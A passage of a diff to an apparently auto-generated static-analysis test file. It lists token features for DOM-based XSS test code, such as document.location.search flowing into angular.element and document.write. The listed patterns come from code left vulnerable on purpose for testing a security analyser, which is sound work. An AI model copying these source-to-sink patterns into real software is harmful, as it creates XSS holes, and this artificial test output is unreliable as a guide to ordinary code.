element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | exceptional return of anonymous function | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | exceptional return of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | functio ... K\\n } | CalleeFlexibleAccessPath | angular.module().service().service().directive().service | | autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | functio ... K\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | functio ... K\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | functio ... K\\n } | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | functio ... K\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | return of anonymous function | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | return of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:101:28:104:5 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:15 | angular | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:15 | angular | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:15 | angular | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:15 | angular | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:15 | angular | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:23 | angular.element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:23 | angular.element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:23 | angular.element | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:23 | angular.element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:23 | angular.element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | angular ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | angular ... search) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | angular ... search) | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | angular ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | angular ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | exceptional return of angular ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | exceptional return of angular ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | exceptional return of angular ... search) | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | exceptional return of angular ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:9:102:49 | exceptional return of angular ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:17:102:23 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:17:102:23 | element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:17:102:23 | element | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:17:102:23 | element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:17:102:23 | element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:32 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:32 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:32 | document | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:32 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:32 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:41 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:41 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:41 | document.location | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:41 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:25:102:41 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:102:25:102:48 | documen ... .search | CalleeFlexibleAccessPath | angular.element | | autogenerated/Xss/DomBasedXss/tst.js:102:25:102:48 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:102:25:102:48 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16423,6 +114295,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:102:25:102:48 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:102:25:102:48 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:102:25:102:48 | documen ... .search | receiverName | angular | +| autogenerated/Xss/DomBasedXss/tst.js:102:34:102:41 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:34:102:41 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:34:102:41 | location | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:34:102:41 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:34:102:41 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:102:43:102:48 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:102:43:102:48 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:102:43:102:48 | search | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:102:43:102:48 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:102:43:102:48 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:15 | angular | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:15 | angular | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:15 | angular | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:15 | angular | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:15 | angular | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:23 | angular.element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:23 | angular.element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:23 | angular.element | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:23 | angular.element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:23 | angular.element | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | angular ... 'SAFE') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | angular ... 'SAFE') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | angular ... 'SAFE') | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | angular ... 'SAFE') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | angular ... 'SAFE') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | exceptional return of angular ... 'SAFE') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | exceptional return of angular ... 'SAFE') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | exceptional return of angular ... 'SAFE') | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | exceptional return of angular ... 'SAFE') | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:103:9:103:31 | exceptional return of angular ... 'SAFE') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:103:17:103:23 | element | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:103:17:103:23 | element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:103:17:103:23 | element | enclosingFunctionBody | angular element document location search angular element SAFE | +| autogenerated/Xss/DomBasedXss/tst.js:103:17:103:23 | element | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:103:17:103:23 | element | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:103:25:103:30 | 'SAFE' | CalleeFlexibleAccessPath | angular.element | | autogenerated/Xss/DomBasedXss/tst.js:103:25:103:30 | 'SAFE' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:103:25:103:30 | 'SAFE' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16431,6 +114338,92 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:103:25:103:30 | 'SAFE' | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:103:25:103:30 | 'SAFE' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:103:25:103:30 | 'SAFE' | receiverName | angular | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:106:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:106:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:106:0 | this | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:106:0 | this | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:106:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | 'arguments' object of function tst | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | 'arguments' object of function tst | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | 'arguments' object of function tst | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | 'arguments' object of function tst | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | 'arguments' object of function tst | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | exceptional return of function tst | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | exceptional return of function tst | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | exceptional return of function tst | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | exceptional return of function tst | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | exceptional return of function tst | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | functio ... e(v);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | functio ... e(v);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | functio ... e(v);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | return of function tst | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 